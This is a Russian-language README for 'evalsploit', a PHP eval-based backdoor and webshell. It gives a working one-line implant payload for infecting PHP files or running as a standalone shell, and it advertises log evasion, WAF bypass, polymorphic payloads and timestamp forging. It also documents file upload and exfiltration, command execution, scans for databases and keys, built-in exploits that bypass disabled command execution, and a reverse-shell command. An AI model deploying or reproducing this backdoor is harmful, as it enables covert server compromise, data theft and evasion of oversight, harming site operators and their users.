Бэкдор, основанный на eval
функции
-
Тихая работа
- Работа на POST-запросах, практическая невидимая для логов
- Встроенная надстройка для байпаса WAF
- Новый юзерагент каждую новую сессию
- Тихий режим работы
- Полиморфные пейлоады
-
Универсальный
- Пейлоад может быть встроен в любой участок заражаемого php кода
- Подходит для работы с серверами на OS linux, Windows, Mac
- Используйте пейлоад для заражения PHP или как самостоятельный шелл:
if(isset($_POST['Z'])){@eval(base64_decode(str_replace($_POST['V'], '' ,$_POST['Z'])));die();}
- При запуске программы evalsploit потребует ссылку на файл с пейлоадом
- При изменении модуля
send
(см. "надстройка программы") используйте командуgen
для генерации нового пейлоада
-
ls
: список файлов в директории- Надстройка
ls
: основано на функции DirectoryIterator (стоит по умолчанию) - Надстройка
dir
: основано на функции ScanDir
- Надстройка
-
cp
: копирование файлов- Использовать разделитель
:
(/что.txt : /куда/что.txt)
- Использовать разделитель
-
cd
: перемещение по файловой системе -
mkd
: создать новую директорию -
upl
: загрузить файл на сервер -
home
: вернуться в __DIR__ -
pwd
: вывод активной директории
-
cat
: вывод содержимого файла- Надстройка
html
: основано на функции htmlentities - Надстройка
base64
: основано на функции base64_encode\base64_decode (стоит по умолчанию)
- Надстройка
-
rm
: удаление файла -
dl
: загрузка файла в папку downloads- Плохо работает с файлами больше 100 мб
-
edit
: изменить содержимое файла- Плохо работает с файлами больше 100 мб
-
mkf
: создать новый файл -
touch
: изменить дату файл- Использовать разделитель
settime
(файл.php settime Год-Месяц-День Час:Минута:Секунда)
- Использовать разделитель
-
stat
: данные о файле -
ren
: переименовать файл- Использовать разделитель
:
(/где/старое.txt : новое.txt)
- Использовать разделитель
-
run
: перейти в режим командной строкиexit
для выхода из режима- Поддерживает exec, shell_exec, system, passthru, popen, proc_open, expect_popen, pcntl_exec, do
-
info
: данные о сервере- Версия php, OS
-
scan
: сканирование выбранной директории- Поиск системных PHP, баз данных, ключей и так далее
-
exploit
: обход запрета командной строки встроенными эксплоитами, активирует режим командной строкиexit
для выхода из режима
-
reverse
: акимвация реверс-шелла -reverse IP:PORT
-
gen
: генерация пейлоада в зависимости от модуля send -
help
: основной экран -
exit
: выход из программы
set
: настройка модулей. Чтобы посмотреть список параметров использоватьset модуль help
- Вместо
help
допустимы-h
,h
,?
,/?
) - run:
exec
,shell_exec
,system
,passthru
,popen
,proc_open
,expect_popen
,pcntl_exec
,do
- ls:
ls
,dir
- cat:
html
,base64
- silent:
1
,0
(тихий режим) - reverse:
ivan
,monkey
- send:
bypass
,classic
,simple
(модуль отправки)
- Вместо
Спасибо Zuo Yunfan за помощь с переводом на китайский язык